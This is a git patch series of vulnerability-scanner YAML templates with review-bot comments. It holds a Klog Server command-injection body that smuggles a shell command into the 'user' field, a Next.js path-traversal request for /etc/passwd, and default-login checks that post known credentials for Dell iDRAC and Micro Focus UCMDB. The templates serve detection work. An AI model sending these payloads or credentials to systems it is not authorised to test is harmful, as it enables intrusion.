--- a/miscellaneous/wp-uploads.yaml +++ b/miscellaneous/wp-uploads-listing.yaml @@ -1,4 +1,4 @@ -id: wp-uploads +id: wp-uploads-listing info: name: WordPress Upload Directory Listing Enable @@ -16,7 +16,8 @@ requests: - "{{BaseURL}}/wp-content/uploads/2019/" - "{{BaseURL}}/wp-content/uploads/2020/" - "{{BaseURL}}/wp-content/uploads/2021/" - - "{BaseURL}/wp-content/uploads/cfdb7_uploads/" + + matchers-condition: and matchers: - type: word words: @@ -24,6 +25,7 @@ requests: - "Index of /" - "[To Parent Directory]" - "Directory: /" + - type: status status: - 200 From 00b8f5a12eb5724e23a867f97e0d1261a53f90be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:36:05 +0000 Subject: [PATCH 048/370] Auto Update README [Fri Feb 26 05:36:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 456c4b8e8a..15f5671301 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 16 | default-logins | 11 | +| workflows | 21 | miscellaneous | 17 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 608 files**. +**62 directories, 609 files**. From 892c25e4d0e280feb9a52dbc0039e5f84cfa4881 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:14:18 +0530 Subject: [PATCH 049/370] Update unauthenticated-nacos-access.yaml --- misconfiguration/unauthenticated-nacos-access.yaml | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index f9f82b3b6d..35e0b30cdc 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -11,6 +11,8 @@ requests: path: - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + User-Agent: Nacos-Server matchers-condition: and matchers: From 36694ceec90adf56c5e5acba7093c8f4d1060bbf Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 11:21:15 +0530 Subject: [PATCH 050/370] wp workflow update --- .../wordpress/wp-license-file.yaml | 2 +- .../wordpress}/wp-uploads-listing.yaml | 2 +- workflows/wordpress-workflow.yaml | 2 ++ 3 files changed, 4 insertions(+), 2 deletions(-) rename miscellaneous/wp-license.yaml => vulnerabilities/wordpress/wp-license-file.yaml (94%) rename {miscellaneous => vulnerabilities/wordpress}/wp-uploads-listing.yaml (93%) diff --git a/miscellaneous/wp-license.yaml b/vulnerabilities/wordpress/wp-license-file.yaml similarity index 94% rename from miscellaneous/wp-license.yaml rename to vulnerabilities/wordpress/wp-license-file.yaml index 35ab078af8..f2ee4bbc05 100644 --- a/miscellaneous/wp-license.yaml +++ b/vulnerabilities/wordpress/wp-license-file.yaml @@ -1,4 +1,4 @@ -id: wp-license +id: wp-license-file info: name: WordPress license file disclosure diff --git a/miscellaneous/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml similarity index 93% rename from miscellaneous/wp-uploads-listing.yaml rename to vulnerabilities/wordpress/wp-uploads-listing.yaml index 90aa73e290..bc2f614fd8 100644 --- a/miscellaneous/wp-uploads-listing.yaml +++ b/vulnerabilities/wordpress/wp-uploads-listing.yaml 
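Review bot: The added `User-Agent: Nacos-Server` header is what makes this check work, but the hunk gives no reason for it, so a later edit could normalise it to a browser UA and silently break detection; add a comment above it, e.g. `# Nacos's server-identity whitelist trusts this User-Agent; the check relies on that default — TODO confirm against the Nacos auth docs` (that reading comes from memory rather than from the hunk, hence the TODO). A `reference:` entry in `info` pointing at the Nacos authentication documentation would also tell operators that the remediation is a server-side setting. The enclosing request definition starts above this hunk.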
@@ -16,7 +16,7 @@ requests: - "{{BaseURL}}/wp-content/uploads/2019/" - "{{BaseURL}}/wp-content/uploads/2020/" - "{{BaseURL}}/wp-content/uploads/2021/" - + - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/" matchers-condition: and matchers: - type: word diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 71d5dc5a5e..36be8a7c7b 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -44,3 +44,5 @@ workflows: - template: vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml - template: vulnerabilities/wordpress/wp-enabled-registration.yaml - template: vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml + - template: vulnerabilities/wordpress/wp-uploads-listing.yaml + - template: vulnerabilities/wordpress/wp-license-file.yaml From 594c657b7d3712b198c9c895c20406a99042e1cb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 05:51:37 +0000 Subject: [PATCH 051/370] Auto Update README [Fri Feb 26 05:51:37 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 15f5671301..aeee504408 100644 --- a/README.md +++ b/README.md @@ -37,9 +37,9 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 17 | default-logins | 11 | +| workflows | 21 | miscellaneous | 15 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | From 19b0fd818afc59e765ea5ced2d836f817189de94 Mon Sep 17 00:00:00 2001 
From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Fri, 26 Feb 2021 08:24:16 -0300 Subject: [PATCH 052/370] Update joomla-htaccess.yaml --- miscellaneous/joomla-htaccess.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 379cb579c1..cbaf0cf796 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -1,7 +1,7 @@ id: joomla-htaccess-file info: - name: Joomla htacces file disclosure + name: Joomla htaccess file disclosure author: oppsec severity: info description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... From 65ca8e7a39e0960fe39d25d4da79a269484fea99 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:40:25 +0700 Subject: [PATCH 053/370] :fire: Add CVE-2020-35729 --- cves/2020/CVE-2020-35729.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2020/CVE-2020-35729.yaml diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml new file mode 100644 index 0000000000..f26cd70f4b --- /dev/null +++ b/cves/2020/CVE-2020-35729.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2020-35729 + +info: + name: Klog Server Unauthenticated Command Injection + author: dwisiswant0 + severity: critical + reference: https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection + description: | + This template exploits an unauthenticated command injection vulnerability + in Klog Server versions 2.4.1 and prior. + + The `authenticate.php` file uses the `user` HTTP POST parameter in a call + to the `shell_exec()` PHP function without appropriate input validation, + allowing arbitrary command execution as the apache user. + + The sudo configuration permits the apache user to execute any command + as root without providing a password, resulting in privileged command + execution as root. + + Originated from Metasploit module, copyright (c) space-r7. + tags: cve,cve2020,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/actions/authenticate.php" + body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' + matchers: + - type: word + words: + - "projectdiscovery.io" \ No newline at end of file From 75df1f3d24723a53185756a16754754564b66e99 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:41:58 +0700 Subject: [PATCH 054/370] :pencil2: Add comments --- cves/2020/CVE-2020-35729.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index f26cd70f4b..3bf7ab0f43 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml 
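Review bot: The POST carries a form body but no `Content-Type` header, and the description says the vulnerable code reads the `user` HTTP POST parameter, which PHP only populates from `application/x-www-form-urlencoded` or multipart bodies; unless nuclei adds that header for `body:` requests on its own (I cannot confirm that from here), add `headers:` with `Content-Type: application/x-www-form-urlencoded` under the request. The lone word matcher has no `part:`; the default is the body, but stating `part: body` makes the contract explicit. The file also ends without a trailing newline (`\ No newline at end of file`).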
@@ -24,8 +24,8 @@ requests: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" - body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' + body: 'user=pdnuclei%20%26%20echo%20%22cHJvamVjdGRpc2NvdmVyeS5pbw%3D%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word words: - - "projectdiscovery.io" \ No newline at end of file + - "projectdiscovery.io" # from Base64 decoding payload \ No newline at end of file From 048b46c04868e2ba260027f8826a5dcd87f22c02 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 18:43:32 +0700 Subject: [PATCH 055/370] :pencil2: Update tags --- cves/2020/CVE-2020-35729.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35729.yaml b/cves/2020/CVE-2020-35729.yaml index 3bf7ab0f43..1f5ac33847 100644 --- a/cves/2020/CVE-2020-35729.yaml +++ b/cves/2020/CVE-2020-35729.yaml @@ -18,7 +18,7 @@ info: execution as root. Originated from Metasploit module, copyright (c) space-r7. - tags: cve,cve2020,apache,rce + tags: cve,cve2020,klog,rce requests: - method: POST From a1a3a8647747501a7ff3de2e86c8f4e8bb15833a Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:02:05 +0700 Subject: [PATCH 056/370] :hammer: Add Micro Focus UCMDB Default Credentials --- ...micro-focus-ucmdb-default-credentials.yaml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml new file mode 100644 index 0000000000..25a7fe3f8e --- /dev/null +++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml 
@@ -0,0 +1,22 @@ +id: micro-focus-ucmdb-default-credentials + +info: + name: Micro Focus UCMDB Default Credentials + author: dwisiswant0 + severity: high + tags: ucmdb,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;" + body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "LWSSO_COOKIE_KEY" + part: header From 13dee2df9f290d80ebfa5c5c69185ae4f878361c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:19:32 +0700 Subject: [PATCH 057/370] :fire: Add CVE-2020-11853 --- cves/2020/CVE-2020-11853.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-11853.yaml diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml new file mode 100644 index 0000000000..5e325fb415 --- /dev/null +++ b/cves/2020/CVE-2020-11853.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-11853 + +info: + name: Micro Focus Operation Bridge Manager RCE + author: dwisiswant0 + severity: high + reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this module can probably also be used to exploit Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,opm,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + - "{{BaseURL}}:8443/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file 
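Review bot: The request path ends in `loginRequest.do;` with a trailing semicolon and nothing says whether that is deliberate; if it is, add `# trailing ';' is intentional — TODO confirm the login servlet requires it` above the path, otherwise drop it. The body carries `isEncoded=false` next to `password=YWRtaW4=`, which is base64, so the two read as contradictory; a one-line comment stating which encoding the endpoint expects would save the next maintainer a round trip. The form body is sent without a `Content-Type` header, which the other default-login template in this series (dell-idrac, patch 062) sets explicitly.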
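Review bot: The word matcher requires the literal `ServerVersion=11.6.0`, so the template reports only that one build while the description says versions 2020.05 and below are affected; a regex on `ServerVersion=` with a bounded version capture, or at least a documented statement that only 11.6.0 is recognised, would avoid silent false negatives. The second path appends `:8443` to `{{BaseURL}}`, which already carries a scheme and possibly a port, so a target given as `https://host:443` would, as far as I can tell, become `https://host:443:8443/ucmdb-api/connect`; either document that the template expects a bare BaseURL or build the alternate-port request another way. `containeirized` in the description should be `containerized`. The same matcher and `:8443` points apply to CVE-2020-11854 in the next patch, which is byte-identical to this file apart from id, name, reference, tags and severity (high here, critical there, for the same check), and the `:8443` concatenation recurs in patch 060.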
From 74a0535f8f3d202ae80ed49cfa6f0da0c24e96eb Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:19:36 +0700 Subject: [PATCH 058/370] :fire: Add CVE-2020-11854 --- cves/2020/CVE-2020-11854.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-11854.yaml diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml new file mode 100644 index 0000000000..d1a1f65238 --- /dev/null +++ b/cves/2020/CVE-2020-11854.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-11854 + +info: + name: Micro Focus UCMDB RCE + author: dwisiswant0 + severity: critical + reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html + description: | + This template supports the detection part only. + + UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, + but this module can probably also be used to exploit Operations Bridge Manager + (containeirized) and Application Performance Management. + + Originated from Metasploit module (#14654). + tags: cve,cve2020,ucmdb,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/ucmdb-api/connect" + - "{{BaseURL}}:8443/ucmdb-api/connect" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "HttpUcmdbServiceProviderFactoryImpl" + - "ServerVersion=11.6.0" + part: body + condition: and \ No newline at end of file From 1ab87a6842908df07fe5f41df817b2e7758a78ac Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:22:23 +0700 Subject: [PATCH 059/370] :recycle: Add Micro Focus Checks workflow --- workflows/micro-focus-workflow.yaml | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 workflows/micro-focus-workflow.yaml diff --git a/workflows/micro-focus-workflow.yaml b/workflows/micro-focus-workflow.yaml new file mode 100644 index 0000000000..1aa19b70da --- /dev/null +++ b/workflows/micro-focus-workflow.yaml 
@@ -0,0 +1,11 @@
+id: micro-focus-workflow
+
+info:
+ name: Micro Focus Checks
+ author: dwisiswant0
+ description: A simple workflow that runs all Micro Focus related nuclei templates on a given target.
+
+workflows:
+ - template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
+ - template: cves/2020/CVE-2020-11853.yaml
+ - template: cves/2020/CVE-2020-11854.yaml
From 9f98cd3da891b4cdca988eee85abae42852bcf5c Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:24:53 +0700 Subject: [PATCH 060/370] :pencil: Add default port --- default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml | 1 + 1 file changed, 1 insertion(+)
diff --git a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
index 25a7fe3f8e..23d8dccad0 100644
--- a/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
+++ b/default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
@@ -10,6 +10,7 @@ requests:
 - method: POST
 path:
 - "{{BaseURL}}/ucmdb-ui/cms/loginRequest.do;"
+ - "{{BaseURL}}:8443/ucmdb-ui/cms/loginRequest.do;"
 body: "customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB"
 matchers-condition: and
 matchers:
From bc00089e97a13f3789b2407aed237e56a87a481d Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Fri, 26 Feb 2021 19:30:30 +0700 Subject: [PATCH 061/370] :blue_book: Update descriptions --- cves/2020/CVE-2020-11853.yaml | 2 +- cves/2020/CVE-2020-11854.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml
index 5e325fb415..8e683f847a 100644
--- a/cves/2020/CVE-2020-11853.yaml
+++ b/cves/2020/CVE-2020-11853.yaml
@@ -9,7 +9,7 @@ info: This template supports the detection part only. UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, - but this module can probably also be used to exploit Operations Bridge Manager + but this template can probably also be used to detect Operations Bridge Manager (containeirized) and Application Performance Management. Originated from Metasploit module (#14654). diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index d1a1f65238..2cc61de29d 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -9,7 +9,7 @@ info: This template supports the detection part only. UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected, - but this module can probably also be used to exploit Operations Bridge Manager + but this template can probably also be used to detect Operations Bridge Manager (containeirized) and Application Performance Management. Originated from Metasploit module (#14654). From 80ab50a9f0fecdf658f2b6efe68572ae661535b0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 18:41:33 +0530 Subject: [PATCH 062/370] misc changes --- .../dell/dell-idrac-default-login.yaml | 10 +++++-- technologies/dell-idrac-detect.yaml | 28 ++----------------- 2 files changed, 9 insertions(+), 29 deletions(-) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 05cd6e1cb6..8a2eee2710 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -1,6 +1,6 @@ id: dell-idrac-default-login info: - name: dell-idrac-default-login + name: Dll iDRAC Default login author: kophjager007 severity: high tags: dell,idrac,dlogin 
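Review bot: `Dll` in the new `name:` of dell-idrac-default-login is a typo for `Dell`; the line should read `name: Dell iDRAC Default login`. Patch 070 later in this series corrects it, but this commit ships the misspelt name into scan output.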
@@ -12,7 +12,6 @@ requests: - "{{BaseURL}}/data/login" body: "user=root&password=calvin" headers: - Host: "{{Hostname}}" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Content-Type: application/x-www-form-urlencode Referer: "{{BaseURL}}/login.html" @@ -21,4 +20,9 @@ requests: matchers: - type: status status: - - 200 \ No newline at end of file + - 200 + + matchers: + - type: word + words: + - 0 \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml index 31618b85bf..ae59631f5c 100644 --- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell-idrac-detect.yaml @@ -10,33 +10,9 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - - "{{BaseURL}}/sysmgmt/2015/bmc/info" + - "{{BaseURL}}/login.html" - matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word - part: body - condition: and words: - - "iDRACName" - - "BuildVersion" - - extractors: - - type: regex - part: header - regex: - - iDRAC/[0-9]{1,2} - - type: regex - part: body - regex: - - iDRAC[0-9]{1,2} - - type: regex - part: body - name: fwver - group: 1 - regex: - - '"FwVer" *: *"([^"]+)"' \ No newline at end of file + - 'Integrated Dell Remote Access Controller' \ No newline at end of file From 367a1117f6305e047ab7f3672705614748f92b9a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 13:12:14 +0000 Subject: [PATCH 063/370] Auto Update README [Fri Feb 26 13:12:14 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 05d10da0c3..c7838f77a8 100644 --- a/README.md +++ b/README.md 
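Review bot: The `@@ -21,4 +20,9 @@` hunk adds a second `matchers:` key to the same request mapping (the first, holding the status matcher, is in the context lines just above it), which is a duplicate key: YAML loaders either reject it or silently keep only the last value, so the status matcher is dropped and only the new word match survives. Merge the word matcher into the existing `matchers:` list and add `matchers-condition: and`. The word `- 0` is an unquoted integer and, as a substring match, fires on any body containing a `0`; if the endpoint answers with `authResult`-style JSON the match should be the quoted `'"authResult":0'` used for iDRAC9 in patch 070. Patch 065 removes the duplicate key but keeps the bare `- 0`. The context line `Content-Type: application/x-www-form-urlencode` is also missing its trailing `d`.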
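Review bot: The rewritten dell-idrac-detect drops the status matcher, `matchers-condition: and` and all three extractors, leaving one word match on `Integrated Dell Remote Access Controller` against `/login.html` with no `part:`, so any response containing that phrase (an error page or a vendor help page, for instance) is reported and the firmware version is no longer extracted. Keep the status matcher under `matchers-condition: and`, and if `/sysmgmt/2015/bmc/info` is being retired for a reason, say so in a comment rather than deleting the extractors with it. Patch 065 later restores most of this, which suggests the deletion was not intended.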
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | -| exposures | 55 | technologies | 47 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 14 | default-logins | 11 | +| exposures | 55 | technologies | 48 | misconfiguration | 48 | +| workflows | 22 | miscellaneous | 14 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**62 directories, 606 files**. +**63 directories, 609 files**. From a7ec2e79b00efaf2b4fa236b249092d683316183 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 26 Feb 2021 13:14:20 +0000 Subject: [PATCH 064/370] Auto Update README [Fri Feb 26 13:14:20 UTC 2021] :robot: --- README.md | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 9cedaad55e..91686dc216 100644 --- a/README.md +++ b/README.md @@ -37,14 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 206 | vulnerabilities | 99 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 101 | exposed-panels | 74 | | exposures | 55 | technologies | 48 | misconfiguration | 48 | -| workflows | 22 | miscellaneous | 14 | default-logins | 12 | +| workflows | 22 | miscellaneous | 15 | default-logins | 12 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**63 directories, 609 files**. - +**63 directories, 612 files**. 
From 1ba9f0d33dc24bb7eca3a61046f9a8e93189d6d5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Fri, 26 Feb 2021 20:04:38 +0530 Subject: [PATCH 065/370] syntax update and added additional endpoints --- .../dell/dell-idrac-default-login.yaml | 1 - technologies/dell-idrac-detect.yaml | 28 ++++++++++++++++++- 2 files changed, 27 insertions(+), 2 deletions(-) diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 8a2eee2710..f0e9139351 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -22,7 +22,6 @@ requests: status: - 200 - matchers: - type: word words: - 0 \ No newline at end of file diff --git a/technologies/dell-idrac-detect.yaml b/technologies/dell-idrac-detect.yaml index ae59631f5c..8e86f218e7 100644 --- a/technologies/dell-idrac-detect.yaml +++ b/technologies/dell-idrac-detect.yaml @@ -10,9 +10,35 @@ requests: headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: + - "{{BaseURL}}/restgui/start.html" + - "{{BaseURL}}/sysmgmt/2015/bmc/info" # Firmware Version and other info (iDRAC9) - "{{BaseURL}}/login.html" + matchers-condition: and matchers: + - type: status + status: + - 200 - type: word + part: body words: - - 'Integrated Dell Remote Access Controller' \ No newline at end of file + - "Dell Integrated Remote Access Controller " + - "Integrated Dell Remote Access Controller" + - "iDRAC" + - "PowerEdge" + + extractors: + - type: regex + part: header + regex: + - iDRAC/[0-9]{1,2} + - type: regex + part: body + regex: + - iDRAC[0-9]{1,2} + - type: regex + part: body + name: fwver + group: 1 + regex: + - '"FwVer" *: *"([^"]+)"' \ No newline at end of file From 211ced6be608f184a50bc558e55eefefc2d638da Mon Sep 17 00:00:00 2001 
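Review bot: In the dell-idrac-detect hunk the word list now includes `"iDRAC"` and `"PowerEdge"` with no `condition`, so the matcher is an OR and `PowerEdge` alone, a string that can appear on other Dell management pages or in generic server documentation, is enough for a positive on any 200 response; either add `condition: and` for a pair of strings that only occur together on iDRAC pages, or drop the two broad words. `"Dell Integrated Remote Access Controller "` keeps a trailing space inside the quotes, which makes the match depend on what follows the phrase; trim it. The inline comment on `/sysmgmt/2015/bmc/info` is useful, and the same kind of note on `/restgui/start.html` (which firmware generation serves it) would help the next reader.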
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 22:05:49 +0700 Subject: [PATCH 066/370] Create CVE-2017-16877.yaml --- cves/2017/CVE-2017-16877.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2017/CVE-2017-16877.yaml diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml new file mode 100644 index 0000000000..8e37e84ce3 --- /dev/null +++ b/cves/2017/CVE-2017-16877.yaml @@ -0,0 +1,26 @@ +id: CVE-2017-16877 + +info: + name: Nextjs v2.4.1 LFI + author: pikpikcu + severity: high + refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 + tags: cve,cve2017,nextjs,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_next/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + part: body + condition: and + + - type: status + status: + - 200 From 481ba6aba1d0c1ad50a993f7cc41ae6acdba540d Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 26 Feb 2021 22:44:31 +0700 Subject: [PATCH 067/370] Create duomicms-sql-injection.yaml --- .../other/duomicms-sql-injection.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/duomicms-sql-injection.yaml diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml new file mode 100644 index 0000000000..b05a57fa60 --- /dev/null +++ b/vulnerabilities/other/duomicms-sql-injection.yaml 
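Review bot: The info block uses `refrence:` instead of `reference:`; as far as I know nuclei does not report unknown info keys, so the link is silently lost from output, and the line should read `reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9`. `condition: and` on a matcher with a single regex is a no-op and reads as though a second pattern went missing; drop it. The same misspelling and the same redundant `condition: and` recur in `duomicms-sql-injection.yaml` in the next patch.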
